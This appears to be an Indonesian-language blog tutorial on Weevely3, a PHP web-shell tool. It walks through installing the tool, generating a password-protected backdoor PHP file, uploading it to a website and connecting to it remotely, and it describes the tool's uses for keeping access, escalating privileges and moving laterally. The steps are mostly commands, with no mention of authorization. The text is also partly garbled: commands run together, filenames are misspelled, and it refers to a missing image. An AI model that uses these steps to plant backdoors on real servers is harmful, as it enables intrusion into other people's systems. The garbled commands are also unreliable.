Weevely adalah
salah satu web tools penetrasi test. shell web command line yang dirancang untuk administrasi server jarak jauh dan
pengujian penetrasi. Terminal mengeksekusi kode remote sewenang-wenang melalui agen PHP tapak kecil yang berada di server HTTP. Lebih
dari 30 modul membentuk administrasi web yang mudah disesuaikan dan
backdoor pasca-eksploitasi untuk pemeliharaan akses, eskalasi hak
istimewa dan pergerakan lateral jaringan, bahkan di lingkungan yang
dibatasi.
Langkah untuk menggunakan tool ini:
1. Pertama perangkat kita harus sudah terinstall tools weevely3nya. Caranya:
git clone git://github.com/epinna/weevely.NB: Jika perangkat belum terintal "git" maka "sudo apt-get install git".git
2. Setelah itu, install dependensi dari weevely, supaya weevely3 bisa berjalan tanpa error.
sudo apt-get install python-prettytable python-mako python-dateutil python-socks python-yaml python
3. Selanjutnya, masuk ke directory weevely3.
cd weevely34. Setelah itu, generate terlebih dahulu backdoor dari weevely3 nya menggunaka perintah.
python weevely.py generate <password> <backdoor.php>
5. Upload file hasil output weevely tadi yang saya berinama "<bacdoor.php" ke website yang telah di siapkan.
6. Setelah terUpload, selanjutnya ke proses remote weevely nya.
python weevely.py http://website/path/backdor.php <password>
Jika sudah seperti gambar di atas berarti kita sudah berhasil masuk melalui backdoor yang di generate dari weevely.
Referensi :
http://www.alinko.jp
EmoticonEmoticon